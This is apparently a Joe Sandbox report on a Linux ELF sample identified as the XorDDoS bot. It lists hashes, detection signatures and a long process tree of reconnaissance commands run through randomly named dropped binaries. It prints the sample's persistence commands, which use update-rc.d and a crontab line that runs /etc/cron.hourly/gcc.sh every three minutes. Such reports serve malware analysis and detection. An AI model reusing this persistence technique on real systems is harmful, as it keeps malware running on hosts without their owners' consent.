Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
1.elf

Overview

General Information

Sample Name:	1.elf
Analysis ID:	1332894
MD5:	ff1a3683a5ad87f88858e92fbcf1ae57
SHA1:	ce220486f7d4723406582f8496e8483bcc546beb
SHA256:	d2d0a9fc3491d0689529b251d666f36b739acfbf4f7fe8190b6ebabb887b7154
Tags:	elf
Infos:

Detection

XorDDoS

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus detection for dropped file

Yara detected XorDDoS Bot

Snort IDS alert for network traffic

Sample tries to persist itself using System V runlevels

Machine Learning detection for dropped file

Sample tries to persist itself using cron

Drops files in suspicious directories

Sample deletes itself

Machine Learning detection for sample

Writes ELF files to disk

Yara signature match

Drops files with innocent-looking names

PID-file does not contain an ASCII number

Writes shell script files to disk

Reads system information from the proc file system

Uses the "uname" system call to query kernel version information (possible evasion)

Executes the "systemctl" command used for controlling the systemd system and service manager

Detected TCP or UDP traffic on non-standard ports

Executes commands using a shell command-line interpreter

Sample and/or dropped files contains symbols with suspicious names

Reads CPU information from /proc indicative of miner or evasive malware

Writes shell script file to disk with an unusual file extension

Classification

×

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1332894
Start date and time:	2023-10-26 20:30:08 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample file name:	1.elf
Detection:	MAL
Classification:	mal100.troj.evad.linELF@0/19@10/0

Warnings

VT rate limit hit for: 1.elf

Runtime Messages

Command:	/tmp/1.elf
PID:	6204
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

system is lnxubuntu20

1.elf (PID: 6204, Parent: 6121, MD5: ff1a3683a5ad87f88858e92fbcf1ae57) Arguments: /tmp/1.elf

1.elf New Fork (PID: 6205, Parent: 6204)

1.elf New Fork (PID: 6206, Parent: 6205)

1.elf New Fork (PID: 6207, Parent: 6206)

1.elf New Fork (PID: 6208, Parent: 6205)

1.elf New Fork (PID: 6209, Parent: 6208)

update-rc.d (PID: 6209, Parent: 1860, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d 1.elf defaults

update-rc.d New Fork (PID: 6215, Parent: 6209)

systemctl (PID: 6215, Parent: 6209, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

1.elf New Fork (PID: 6210, Parent: 6205)

sh (PID: 6210, Parent: 6205, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"

sh New Fork (PID: 6211, Parent: 6210)

sed (PID: 6211, Parent: 6210, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab

1.elf New Fork (PID: 6238, Parent: 6205)

1.elf New Fork (PID: 6239, Parent: 6238)

ccxfvtbhgr (PID: 6239, Parent: 6238, MD5: 6a5eca188339a325e9ac1189dbb89376) Arguments: /usr/bin/ccxfvtbhgr su 6205

ccxfvtbhgr New Fork (PID: 6240, Parent: 6239)

1.elf New Fork (PID: 6241, Parent: 6205)

1.elf New Fork (PID: 6242, Parent: 6241)

ccxfvtbhgr (PID: 6242, Parent: 6241, MD5: 6a5eca188339a325e9ac1189dbb89376) Arguments: /usr/bin/ccxfvtbhgr "netstat -antop" 6205

ccxfvtbhgr New Fork (PID: 6243, Parent: 6242)

1.elf New Fork (PID: 6244, Parent: 6205)

1.elf New Fork (PID: 6245, Parent: 6244)

ccxfvtbhgr (PID: 6245, Parent: 6244, MD5: 6a5eca188339a325e9ac1189dbb89376) Arguments: /usr/bin/ccxfvtbhgr whoami 6205

ccxfvtbhgr New Fork (PID: 6248, Parent: 6245)

1.elf New Fork (PID: 6246, Parent: 6205)

1.elf New Fork (PID: 6247, Parent: 6246)

ccxfvtbhgr (PID: 6247, Parent: 6246, MD5: 6a5eca188339a325e9ac1189dbb89376) Arguments: /usr/bin/ccxfvtbhgr ifconfig 6205

ccxfvtbhgr New Fork (PID: 6251, Parent: 6247)

1.elf New Fork (PID: 6249, Parent: 6205)

1.elf New Fork (PID: 6250, Parent: 6249)

ccxfvtbhgr (PID: 6250, Parent: 6249, MD5: 6a5eca188339a325e9ac1189dbb89376) Arguments: /usr/bin/ccxfvtbhgr "netstat -antop" 6205

ccxfvtbhgr New Fork (PID: 6252, Parent: 6250)

1.elf New Fork (PID: 6257, Parent: 6205)

1.elf New Fork (PID: 6258, Parent: 6257)

ezztyrfjzf (PID: 6258, Parent: 6257, MD5: 9e1504dcb6964dbc17834520c7a967c0) Arguments: /usr/bin/ezztyrfjzf "cat resolv.conf" 6205

ezztyrfjzf New Fork (PID: 6259, Parent: 6258)

1.elf New Fork (PID: 6260, Parent: 6205)

1.elf New Fork (PID: 6261, Parent: 6260)

ezztyrfjzf (PID: 6261, Parent: 6260, MD5: 9e1504dcb6964dbc17834520c7a967c0) Arguments: /usr/bin/ezztyrfjzf ifconfig 6205

ezztyrfjzf New Fork (PID: 6262, Parent: 6261)

1.elf New Fork (PID: 6263, Parent: 6205)

1.elf New Fork (PID: 6264, Parent: 6263)

ezztyrfjzf (PID: 6264, Parent: 6263, MD5: 9e1504dcb6964dbc17834520c7a967c0) Arguments: /usr/bin/ezztyrfjzf ls 6205

ezztyrfjzf New Fork (PID: 6267, Parent: 6264)

1.elf New Fork (PID: 6265, Parent: 6205)

1.elf New Fork (PID: 6266, Parent: 6265)

ezztyrfjzf (PID: 6266, Parent: 6265, MD5: 9e1504dcb6964dbc17834520c7a967c0) Arguments: /usr/bin/ezztyrfjzf "ps -ef" 6205

ezztyrfjzf New Fork (PID: 6270, Parent: 6266)

1.elf New Fork (PID: 6268, Parent: 6205)

1.elf New Fork (PID: 6269, Parent: 6268)

ezztyrfjzf (PID: 6269, Parent: 6268, MD5: 9e1504dcb6964dbc17834520c7a967c0) Arguments: /usr/bin/ezztyrfjzf "netstat -antop" 6205

ezztyrfjzf New Fork (PID: 6271, Parent: 6269)

1.elf New Fork (PID: 6274, Parent: 6205)

1.elf New Fork (PID: 6275, Parent: 6274)

dyuvutukki (PID: 6275, Parent: 6274, MD5: 0aca8cf23a8c3e87b13a9c7043110017) Arguments: /usr/bin/dyuvutukki "echo \"find\"" 6205

dyuvutukki New Fork (PID: 6276, Parent: 6275)

1.elf New Fork (PID: 6277, Parent: 6205)

1.elf New Fork (PID: 6278, Parent: 6277)

dyuvutukki (PID: 6278, Parent: 6277, MD5: 0aca8cf23a8c3e87b13a9c7043110017) Arguments: /usr/bin/dyuvutukki "cat resolv.conf" 6205

dyuvutukki New Fork (PID: 6280, Parent: 6278)

1.elf New Fork (PID: 6279, Parent: 6205)

1.elf New Fork (PID: 6281, Parent: 6279)

dyuvutukki (PID: 6281, Parent: 6279, MD5: 0aca8cf23a8c3e87b13a9c7043110017) Arguments: /usr/bin/dyuvutukki "ifconfig eth0" 6205

dyuvutukki New Fork (PID: 6283, Parent: 6281)

1.elf New Fork (PID: 6282, Parent: 6205)

1.elf New Fork (PID: 6284, Parent: 6282)

dyuvutukki (PID: 6284, Parent: 6282, MD5: 0aca8cf23a8c3e87b13a9c7043110017) Arguments: /usr/bin/dyuvutukki id 6205

dyuvutukki New Fork (PID: 6287, Parent: 6284)

1.elf New Fork (PID: 6285, Parent: 6205)

1.elf New Fork (PID: 6286, Parent: 6285)

dyuvutukki (PID: 6286, Parent: 6285, MD5: 0aca8cf23a8c3e87b13a9c7043110017) Arguments: /usr/bin/dyuvutukki uptime 6205

dyuvutukki New Fork (PID: 6288, Parent: 6286)

1.elf New Fork (PID: 6312, Parent: 6205)

1.elf New Fork (PID: 6313, Parent: 6312)

vapcvdizxx (PID: 6313, Parent: 6312, MD5: a5394a1ee3b201dfd0198300b6604608) Arguments: /usr/bin/vapcvdizxx "route -n" 6205

vapcvdizxx New Fork (PID: 6314, Parent: 6313)

1.elf New Fork (PID: 6315, Parent: 6205)

1.elf New Fork (PID: 6316, Parent: 6315)

vapcvdizxx (PID: 6316, Parent: 6315, MD5: a5394a1ee3b201dfd0198300b6604608) Arguments: /usr/bin/vapcvdizxx top 6205

vapcvdizxx New Fork (PID: 6319, Parent: 6316)

1.elf New Fork (PID: 6317, Parent: 6205)

1.elf New Fork (PID: 6318, Parent: 6317)

vapcvdizxx (PID: 6318, Parent: 6317, MD5: a5394a1ee3b201dfd0198300b6604608) Arguments: /usr/bin/vapcvdizxx su 6205

vapcvdizxx New Fork (PID: 6322, Parent: 6318)

1.elf New Fork (PID: 6320, Parent: 6205)

1.elf New Fork (PID: 6321, Parent: 6320)

vapcvdizxx (PID: 6321, Parent: 6320, MD5: a5394a1ee3b201dfd0198300b6604608) Arguments: /usr/bin/vapcvdizxx "echo \"find\"" 6205

vapcvdizxx New Fork (PID: 6325, Parent: 6321)

1.elf New Fork (PID: 6323, Parent: 6205)

1.elf New Fork (PID: 6324, Parent: 6323)

vapcvdizxx (PID: 6324, Parent: 6323, MD5: a5394a1ee3b201dfd0198300b6604608) Arguments: /usr/bin/vapcvdizxx top 6205

vapcvdizxx New Fork (PID: 6326, Parent: 6324)

1.elf New Fork (PID: 6329, Parent: 6205)

1.elf New Fork (PID: 6330, Parent: 6329)

lkzqkklpfr (PID: 6330, Parent: 6329, MD5: 26d5465cc1a2caff5bb4ee89004cbcae) Arguments: /usr/bin/lkzqkklpfr "cd /etc" 6205

lkzqkklpfr New Fork (PID: 6331, Parent: 6330)

1.elf New Fork (PID: 6332, Parent: 6205)

1.elf New Fork (PID: 6333, Parent: 6332)

lkzqkklpfr (PID: 6333, Parent: 6332, MD5: 26d5465cc1a2caff5bb4ee89004cbcae) Arguments: /usr/bin/lkzqkklpfr whoami 6205

lkzqkklpfr New Fork (PID: 6334, Parent: 6333)

1.elf New Fork (PID: 6335, Parent: 6205)

1.elf New Fork (PID: 6336, Parent: 6335)

lkzqkklpfr (PID: 6336, Parent: 6335, MD5: 26d5465cc1a2caff5bb4ee89004cbcae) Arguments: /usr/bin/lkzqkklpfr who 6205

lkzqkklpfr New Fork (PID: 6339, Parent: 6336)

1.elf New Fork (PID: 6337, Parent: 6205)

1.elf New Fork (PID: 6338, Parent: 6337)

lkzqkklpfr (PID: 6338, Parent: 6337, MD5: 26d5465cc1a2caff5bb4ee89004cbcae) Arguments: /usr/bin/lkzqkklpfr ifconfig 6205

lkzqkklpfr New Fork (PID: 6342, Parent: 6338)

1.elf New Fork (PID: 6340, Parent: 6205)

1.elf New Fork (PID: 6341, Parent: 6340)

lkzqkklpfr (PID: 6341, Parent: 6340, MD5: 26d5465cc1a2caff5bb4ee89004cbcae) Arguments: /usr/bin/lkzqkklpfr "ls -la" 6205

lkzqkklpfr New Fork (PID: 6343, Parent: 6341)

1.elf New Fork (PID: 6346, Parent: 6205)

1.elf New Fork (PID: 6347, Parent: 6346)

cpbnjarskl (PID: 6347, Parent: 6346, MD5: bdf7e50117e6bb11039b3f114d7da203) Arguments: /usr/bin/cpbnjarskl "ps -ef" 6205

cpbnjarskl New Fork (PID: 6348, Parent: 6347)

1.elf New Fork (PID: 6349, Parent: 6205)

1.elf New Fork (PID: 6350, Parent: 6349)

cpbnjarskl (PID: 6350, Parent: 6349, MD5: bdf7e50117e6bb11039b3f114d7da203) Arguments: /usr/bin/cpbnjarskl who 6205

cpbnjarskl New Fork (PID: 6352, Parent: 6350)

1.elf New Fork (PID: 6351, Parent: 6205)

1.elf New Fork (PID: 6353, Parent: 6351)

cpbnjarskl (PID: 6353, Parent: 6351, MD5: bdf7e50117e6bb11039b3f114d7da203) Arguments: /usr/bin/cpbnjarskl bash 6205

cpbnjarskl New Fork (PID: 6356, Parent: 6353)

1.elf New Fork (PID: 6354, Parent: 6205)

1.elf New Fork (PID: 6355, Parent: 6354)

cpbnjarskl (PID: 6355, Parent: 6354, MD5: bdf7e50117e6bb11039b3f114d7da203) Arguments: /usr/bin/cpbnjarskl ls 6205

cpbnjarskl New Fork (PID: 6359, Parent: 6355)

1.elf New Fork (PID: 6357, Parent: 6205)

1.elf New Fork (PID: 6358, Parent: 6357)

cpbnjarskl (PID: 6358, Parent: 6357, MD5: bdf7e50117e6bb11039b3f114d7da203) Arguments: /usr/bin/cpbnjarskl id 6205

cpbnjarskl New Fork (PID: 6360, Parent: 6358)

1.elf New Fork (PID: 6363, Parent: 6205)

1.elf New Fork (PID: 6364, Parent: 6363)

uaewjndswe (PID: 6364, Parent: 6363, MD5: 042d91770189023b9e7a41c9db18e788) Arguments: /usr/bin/uaewjndswe "route -n" 6205

uaewjndswe New Fork (PID: 6365, Parent: 6364)

1.elf New Fork (PID: 6366, Parent: 6205)

1.elf New Fork (PID: 6367, Parent: 6366)

uaewjndswe (PID: 6367, Parent: 6366, MD5: 042d91770189023b9e7a41c9db18e788) Arguments: /usr/bin/uaewjndswe id 6205

uaewjndswe New Fork (PID: 6369, Parent: 6367)

1.elf New Fork (PID: 6368, Parent: 6205)

1.elf New Fork (PID: 6370, Parent: 6368)

uaewjndswe (PID: 6370, Parent: 6368, MD5: 042d91770189023b9e7a41c9db18e788) Arguments: /usr/bin/uaewjndswe ifconfig 6205

uaewjndswe New Fork (PID: 6373, Parent: 6370)

1.elf New Fork (PID: 6371, Parent: 6205)

1.elf New Fork (PID: 6372, Parent: 6371)

uaewjndswe (PID: 6372, Parent: 6371, MD5: 042d91770189023b9e7a41c9db18e788) Arguments: /usr/bin/uaewjndswe "cd /etc" 6205

uaewjndswe New Fork (PID: 6376, Parent: 6372)

1.elf New Fork (PID: 6374, Parent: 6205)

1.elf New Fork (PID: 6375, Parent: 6374)

uaewjndswe (PID: 6375, Parent: 6374, MD5: 042d91770189023b9e7a41c9db18e788) Arguments: /usr/bin/uaewjndswe uptime 6205

uaewjndswe New Fork (PID: 6377, Parent: 6375)

1.elf New Fork (PID: 6382, Parent: 6205)

1.elf New Fork (PID: 6383, Parent: 6382)

efgdvbpuxx (PID: 6383, Parent: 6382, MD5: 5adf54da233ddd71999a30ae5852d13e) Arguments: /usr/bin/efgdvbpuxx "cat resolv.conf" 6205

efgdvbpuxx New Fork (PID: 6384, Parent: 6383)

1.elf New Fork (PID: 6385, Parent: 6205)

1.elf New Fork (PID: 6386, Parent: 6385)

efgdvbpuxx (PID: 6386, Parent: 6385, MD5: 5adf54da233ddd71999a30ae5852d13e) Arguments: /usr/bin/efgdvbpuxx pwd 6205

efgdvbpuxx New Fork (PID: 6387, Parent: 6386)

1.elf New Fork (PID: 6388, Parent: 6205)

1.elf New Fork (PID: 6389, Parent: 6388)

efgdvbpuxx (PID: 6389, Parent: 6388, MD5: 5adf54da233ddd71999a30ae5852d13e) Arguments: /usr/bin/efgdvbpuxx "ps -ef" 6205

efgdvbpuxx New Fork (PID: 6392, Parent: 6389)

1.elf New Fork (PID: 6390, Parent: 6205)

1.elf New Fork (PID: 6391, Parent: 6390)

efgdvbpuxx (PID: 6391, Parent: 6390, MD5: 5adf54da233ddd71999a30ae5852d13e) Arguments: /usr/bin/efgdvbpuxx top 6205

efgdvbpuxx New Fork (PID: 6395, Parent: 6391)

1.elf New Fork (PID: 6393, Parent: 6205)

1.elf New Fork (PID: 6394, Parent: 6393)

efgdvbpuxx (PID: 6394, Parent: 6393, MD5: 5adf54da233ddd71999a30ae5852d13e) Arguments: /usr/bin/efgdvbpuxx whoami 6205

efgdvbpuxx New Fork (PID: 6396, Parent: 6394)

1.elf New Fork (PID: 6402, Parent: 6205)

1.elf New Fork (PID: 6403, Parent: 6402)

nxattrsdxm (PID: 6403, Parent: 6402, MD5: 25b1b59dad8e150a80d50015eb75bd53) Arguments: /usr/bin/nxattrsdxm pwd 6205

nxattrsdxm New Fork (PID: 6404, Parent: 6403)

1.elf New Fork (PID: 6405, Parent: 6205)

1.elf New Fork (PID: 6406, Parent: 6405)

nxattrsdxm (PID: 6406, Parent: 6405, MD5: 25b1b59dad8e150a80d50015eb75bd53) Arguments: /usr/bin/nxattrsdxm "netstat -an" 6205

nxattrsdxm New Fork (PID: 6407, Parent: 6406)

1.elf New Fork (PID: 6408, Parent: 6205)

1.elf New Fork (PID: 6409, Parent: 6408)

nxattrsdxm (PID: 6409, Parent: 6408, MD5: 25b1b59dad8e150a80d50015eb75bd53) Arguments: /usr/bin/nxattrsdxm ls 6205

nxattrsdxm New Fork (PID: 6410, Parent: 6409)

1.elf New Fork (PID: 6411, Parent: 6205)

1.elf New Fork (PID: 6412, Parent: 6411)

nxattrsdxm (PID: 6412, Parent: 6411, MD5: 25b1b59dad8e150a80d50015eb75bd53) Arguments: /usr/bin/nxattrsdxm "netstat -an" 6205

nxattrsdxm New Fork (PID: 6413, Parent: 6412)

1.elf New Fork (PID: 6414, Parent: 6205)

1.elf New Fork (PID: 6415, Parent: 6414)

nxattrsdxm (PID: 6415, Parent: 6414, MD5: 25b1b59dad8e150a80d50015eb75bd53) Arguments: /usr/bin/nxattrsdxm "cd /etc" 6205

nxattrsdxm New Fork (PID: 6416, Parent: 6415)

1.elf New Fork (PID: 6419, Parent: 6205)

1.elf New Fork (PID: 6420, Parent: 6419)

bjhrrojebv (PID: 6420, Parent: 6419, MD5: 305f5484460feb573c4a06d56e6ac96a) Arguments: /usr/bin/bjhrrojebv who 6205

bjhrrojebv New Fork (PID: 6421, Parent: 6420)

1.elf New Fork (PID: 6422, Parent: 6205)

1.elf New Fork (PID: 6423, Parent: 6422)

bjhrrojebv (PID: 6423, Parent: 6422, MD5: 305f5484460feb573c4a06d56e6ac96a) Arguments: /usr/bin/bjhrrojebv uptime 6205

bjhrrojebv New Fork (PID: 6426, Parent: 6423)

1.elf New Fork (PID: 6424, Parent: 6205)

1.elf New Fork (PID: 6425, Parent: 6424)

bjhrrojebv (PID: 6425, Parent: 6424, MD5: 305f5484460feb573c4a06d56e6ac96a) Arguments: /usr/bin/bjhrrojebv "ls -la" 6205

bjhrrojebv New Fork (PID: 6429, Parent: 6425)

1.elf New Fork (PID: 6427, Parent: 6205)

1.elf New Fork (PID: 6428, Parent: 6427)

bjhrrojebv (PID: 6428, Parent: 6427, MD5: 305f5484460feb573c4a06d56e6ac96a) Arguments: /usr/bin/bjhrrojebv top 6205

bjhrrojebv New Fork (PID: 6432, Parent: 6428)

1.elf New Fork (PID: 6430, Parent: 6205)

1.elf New Fork (PID: 6431, Parent: 6430)

bjhrrojebv (PID: 6431, Parent: 6430, MD5: 305f5484460feb573c4a06d56e6ac96a) Arguments: /usr/bin/bjhrrojebv gnome-terminal 6205

bjhrrojebv New Fork (PID: 6433, Parent: 6431)

1.elf New Fork (PID: 6436, Parent: 6205)

1.elf New Fork (PID: 6437, Parent: 6436)

vlteqhfomz (PID: 6437, Parent: 6436, MD5: 41fc2d5615191266df1f6ab89f56e741) Arguments: /usr/bin/vlteqhfomz "netstat -an" 6205

vlteqhfomz New Fork (PID: 6438, Parent: 6437)

1.elf New Fork (PID: 6439, Parent: 6205)

1.elf New Fork (PID: 6440, Parent: 6439)

vlteqhfomz (PID: 6440, Parent: 6439, MD5: 41fc2d5615191266df1f6ab89f56e741) Arguments: /usr/bin/vlteqhfomz uptime 6205

vlteqhfomz New Fork (PID: 6443, Parent: 6440)

1.elf New Fork (PID: 6441, Parent: 6205)

1.elf New Fork (PID: 6442, Parent: 6441)

vlteqhfomz (PID: 6442, Parent: 6441, MD5: 41fc2d5615191266df1f6ab89f56e741) Arguments: /usr/bin/vlteqhfomz "grep \"A\"" 6205

vlteqhfomz New Fork (PID: 6446, Parent: 6442)

1.elf New Fork (PID: 6444, Parent: 6205)

1.elf New Fork (PID: 6445, Parent: 6444)

vlteqhfomz (PID: 6445, Parent: 6444, MD5: 41fc2d5615191266df1f6ab89f56e741) Arguments: /usr/bin/vlteqhfomz su 6205

vlteqhfomz New Fork (PID: 6449, Parent: 6445)

1.elf New Fork (PID: 6447, Parent: 6205)

1.elf New Fork (PID: 6448, Parent: 6447)

vlteqhfomz (PID: 6448, Parent: 6447, MD5: 41fc2d5615191266df1f6ab89f56e741) Arguments: /usr/bin/vlteqhfomz id 6205

vlteqhfomz New Fork (PID: 6450, Parent: 6448)

1.elf New Fork (PID: 6453, Parent: 6205)

1.elf New Fork (PID: 6454, Parent: 6453)

wxysocrflf (PID: 6454, Parent: 6453, MD5: 4af31d012bbcff0a3da05560012a0665) Arguments: /usr/bin/wxysocrflf id 6205

wxysocrflf New Fork (PID: 6455, Parent: 6454)

1.elf New Fork (PID: 6456, Parent: 6205)

1.elf New Fork (PID: 6457, Parent: 6456)

wxysocrflf (PID: 6457, Parent: 6456, MD5: 4af31d012bbcff0a3da05560012a0665) Arguments: /usr/bin/wxysocrflf "echo \"find\"" 6205

wxysocrflf New Fork (PID: 6459, Parent: 6457)

1.elf New Fork (PID: 6458, Parent: 6205)

1.elf New Fork (PID: 6460, Parent: 6458)

wxysocrflf (PID: 6460, Parent: 6458, MD5: 4af31d012bbcff0a3da05560012a0665) Arguments: /usr/bin/wxysocrflf bash 6205

wxysocrflf New Fork (PID: 6463, Parent: 6460)

1.elf New Fork (PID: 6461, Parent: 6205)

1.elf New Fork (PID: 6462, Parent: 6461)

wxysocrflf (PID: 6462, Parent: 6461, MD5: 4af31d012bbcff0a3da05560012a0665) Arguments: /usr/bin/wxysocrflf top 6205

wxysocrflf New Fork (PID: 6466, Parent: 6462)

1.elf New Fork (PID: 6464, Parent: 6205)

1.elf New Fork (PID: 6465, Parent: 6464)

wxysocrflf (PID: 6465, Parent: 6464, MD5: 4af31d012bbcff0a3da05560012a0665) Arguments: /usr/bin/wxysocrflf id 6205

wxysocrflf New Fork (PID: 6467, Parent: 6465)

1.elf New Fork (PID: 6470, Parent: 6205)

1.elf New Fork (PID: 6471, Parent: 6470)

ssrfvzfvpk (PID: 6471, Parent: 6470, MD5: c7f6b1948208a5e292a0ce152567dd8f) Arguments: /usr/bin/ssrfvzfvpk pwd 6205

ssrfvzfvpk New Fork (PID: 6472, Parent: 6471)

1.elf New Fork (PID: 6473, Parent: 6205)

1.elf New Fork (PID: 6474, Parent: 6473)

ssrfvzfvpk (PID: 6474, Parent: 6473, MD5: c7f6b1948208a5e292a0ce152567dd8f) Arguments: /usr/bin/ssrfvzfvpk "ifconfig eth0" 6205

ssrfvzfvpk New Fork (PID: 6476, Parent: 6474)

1.elf New Fork (PID: 6475, Parent: 6205)

1.elf New Fork (PID: 6477, Parent: 6475)

ssrfvzfvpk (PID: 6477, Parent: 6475, MD5: c7f6b1948208a5e292a0ce152567dd8f) Arguments: /usr/bin/ssrfvzfvpk top 6205

ssrfvzfvpk New Fork (PID: 6480, Parent: 6477)

1.elf New Fork (PID: 6478, Parent: 6205)

1.elf New Fork (PID: 6479, Parent: 6478)

ssrfvzfvpk (PID: 6479, Parent: 6478, MD5: c7f6b1948208a5e292a0ce152567dd8f) Arguments: /usr/bin/ssrfvzfvpk ifconfig 6205

ssrfvzfvpk New Fork (PID: 6481, Parent: 6479)

1.elf New Fork (PID: 6482, Parent: 6205)

1.elf New Fork (PID: 6483, Parent: 6482)

ssrfvzfvpk (PID: 6483, Parent: 6482, MD5: c7f6b1948208a5e292a0ce152567dd8f) Arguments: /usr/bin/ssrfvzfvpk "route -n" 6205

ssrfvzfvpk New Fork (PID: 6484, Parent: 6483)

1.elf New Fork (PID: 6488, Parent: 6205)

1.elf New Fork (PID: 6489, Parent: 6488)

bhmsjmfdgk (PID: 6489, Parent: 6488, MD5: 78478a175b52118257c1908b16bd07f5) Arguments: /usr/bin/bhmsjmfdgk "sleep 1" 6205

bhmsjmfdgk New Fork (PID: 6490, Parent: 6489)

1.elf New Fork (PID: 6491, Parent: 6205)

1.elf New Fork (PID: 6492, Parent: 6491)

bhmsjmfdgk (PID: 6492, Parent: 6491, MD5: 78478a175b52118257c1908b16bd07f5) Arguments: /usr/bin/bhmsjmfdgk whoami 6205

bhmsjmfdgk New Fork (PID: 6493, Parent: 6492)

1.elf New Fork (PID: 6494, Parent: 6205)

1.elf New Fork (PID: 6495, Parent: 6494)

bhmsjmfdgk (PID: 6495, Parent: 6494, MD5: 78478a175b52118257c1908b16bd07f5) Arguments: /usr/bin/bhmsjmfdgk "sleep 1" 6205

bhmsjmfdgk New Fork (PID: 6497, Parent: 6495)

1.elf New Fork (PID: 6496, Parent: 6205)

1.elf New Fork (PID: 6498, Parent: 6496)

bhmsjmfdgk (PID: 6498, Parent: 6496, MD5: 78478a175b52118257c1908b16bd07f5) Arguments: /usr/bin/bhmsjmfdgk gnome-terminal 6205

bhmsjmfdgk New Fork (PID: 6501, Parent: 6498)

1.elf New Fork (PID: 6499, Parent: 6205)

1.elf New Fork (PID: 6500, Parent: 6499)

bhmsjmfdgk (PID: 6500, Parent: 6499, MD5: 78478a175b52118257c1908b16bd07f5) Arguments: /usr/bin/bhmsjmfdgk pwd 6205

bhmsjmfdgk New Fork (PID: 6502, Parent: 6500)

1.elf New Fork (PID: 6505, Parent: 6205)

1.elf New Fork (PID: 6506, Parent: 6505)

ctjziyscga (PID: 6506, Parent: 6505, MD5: be0d21af660064bc9a4c5c1292894f1d) Arguments: /usr/bin/ctjziyscga "ls -la" 6205

ctjziyscga New Fork (PID: 6507, Parent: 6506)

1.elf New Fork (PID: 6508, Parent: 6205)

1.elf New Fork (PID: 6509, Parent: 6508)

ctjziyscga (PID: 6509, Parent: 6508, MD5: be0d21af660064bc9a4c5c1292894f1d) Arguments: /usr/bin/ctjziyscga pwd 6205

ctjziyscga New Fork (PID: 6511, Parent: 6509)

1.elf New Fork (PID: 6510, Parent: 6205)

1.elf New Fork (PID: 6512, Parent: 6510)

ctjziyscga (PID: 6512, Parent: 6510, MD5: be0d21af660064bc9a4c5c1292894f1d) Arguments: /usr/bin/ctjziyscga "netstat -antop" 6205

ctjziyscga New Fork (PID: 6515, Parent: 6512)

1.elf New Fork (PID: 6513, Parent: 6205)

1.elf New Fork (PID: 6514, Parent: 6513)

ctjziyscga (PID: 6514, Parent: 6513, MD5: be0d21af660064bc9a4c5c1292894f1d) Arguments: /usr/bin/ctjziyscga id 6205

ctjziyscga New Fork (PID: 6520, Parent: 6514)

1.elf New Fork (PID: 6516, Parent: 6205)

1.elf New Fork (PID: 6517, Parent: 6516)

ctjziyscga (PID: 6517, Parent: 6516, MD5: be0d21af660064bc9a4c5c1292894f1d) Arguments: /usr/bin/ctjziyscga "ifconfig eth0" 6205

ctjziyscga New Fork (PID: 6521, Parent: 6517)

1.elf New Fork (PID: 6524, Parent: 6205)

1.elf New Fork (PID: 6525, Parent: 6524)

ggufoivoip (PID: 6525, Parent: 6524, MD5: 9b2c11b824ddfcc1d5f7ae5bc4b60f09) Arguments: /usr/bin/ggufoivoip "echo \"find\"" 6205

ggufoivoip New Fork (PID: 6526, Parent: 6525)

1.elf New Fork (PID: 6527, Parent: 6205)

1.elf New Fork (PID: 6528, Parent: 6527)

ggufoivoip (PID: 6528, Parent: 6527, MD5: 9b2c11b824ddfcc1d5f7ae5bc4b60f09) Arguments: /usr/bin/ggufoivoip pwd 6205

ggufoivoip New Fork (PID: 6530, Parent: 6528)

1.elf New Fork (PID: 6529, Parent: 6205)

1.elf New Fork (PID: 6531, Parent: 6529)

ggufoivoip (PID: 6531, Parent: 6529, MD5: 9b2c11b824ddfcc1d5f7ae5bc4b60f09) Arguments: /usr/bin/ggufoivoip "netstat -antop" 6205

ggufoivoip New Fork (PID: 6532, Parent: 6531)

1.elf New Fork (PID: 6533, Parent: 6205)

1.elf New Fork (PID: 6534, Parent: 6533)

ggufoivoip (PID: 6534, Parent: 6533, MD5: 9b2c11b824ddfcc1d5f7ae5bc4b60f09) Arguments: /usr/bin/ggufoivoip "echo \"find\"" 6205

ggufoivoip New Fork (PID: 6536, Parent: 6534)

1.elf New Fork (PID: 6535, Parent: 6205)

1.elf New Fork (PID: 6537, Parent: 6535)

ggufoivoip (PID: 6537, Parent: 6535, MD5: 9b2c11b824ddfcc1d5f7ae5bc4b60f09) Arguments: /usr/bin/ggufoivoip "netstat -an" 6205

ggufoivoip New Fork (PID: 6538, Parent: 6537)

1.elf New Fork (PID: 6542, Parent: 6205)

1.elf New Fork (PID: 6543, Parent: 6542)

gvjfjjanun (PID: 6543, Parent: 6542, MD5: 4780b1384292ab14583c4f650cf92dc1) Arguments: /usr/bin/gvjfjjanun "echo \"find\"" 6205

gvjfjjanun New Fork (PID: 6544, Parent: 6543)

1.elf New Fork (PID: 6545, Parent: 6205)

1.elf New Fork (PID: 6546, Parent: 6545)

gvjfjjanun (PID: 6546, Parent: 6545, MD5: 4780b1384292ab14583c4f650cf92dc1) Arguments: /usr/bin/gvjfjjanun "cd /etc" 6205

gvjfjjanun New Fork (PID: 6547, Parent: 6546)

1.elf New Fork (PID: 6548, Parent: 6205)

1.elf New Fork (PID: 6549, Parent: 6548)

gvjfjjanun (PID: 6549, Parent: 6548, MD5: 4780b1384292ab14583c4f650cf92dc1) Arguments: /usr/bin/gvjfjjanun id 6205

gvjfjjanun New Fork (PID: 6552, Parent: 6549)

1.elf New Fork (PID: 6550, Parent: 6205)

1.elf New Fork (PID: 6551, Parent: 6550)

